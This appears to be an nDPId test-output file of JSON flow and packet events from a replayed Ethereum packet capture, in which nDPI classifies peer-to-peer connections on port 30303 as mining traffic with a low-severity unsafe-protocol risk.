00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1578508365461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcQtMAAEARjkPAqAG4ynAcanZfdl8AiDkPCEixaJX\/9thQC0r9cGcsCeen+iETb10JXBU9BZQL28M1nK8vCE6bMd2SC2XGliMqSbi8oqYHUjyrBa753h2KySNTFNso18+nMzMVWvdibnHX4lluxe+\/vRPiYB2kYX3uAAHdBMuEfwAAAYJ2X4J2X8mEynAcaoJ2X4CEXhYgYQU="}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1578508365567,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365567,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcHIoAAEARCbPAqAG4agwnqHZfdn0AiGszdDnl2LgHwUzwnp\/NUaAjl2\/6ukAyoGtKBC9U9NcJJ2SSjY1bIBQONPG3UmfcMXvTBTN6oZMu6GXIBxr9UadDckfonN6CsHl3H7EBI7wV8mnDuf+AbUa\/i02tPDo+DL09AAHdBMuEfwAAAYJ2X4J2X8mEagwnqIJ2fYCEXhYgYQU="}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
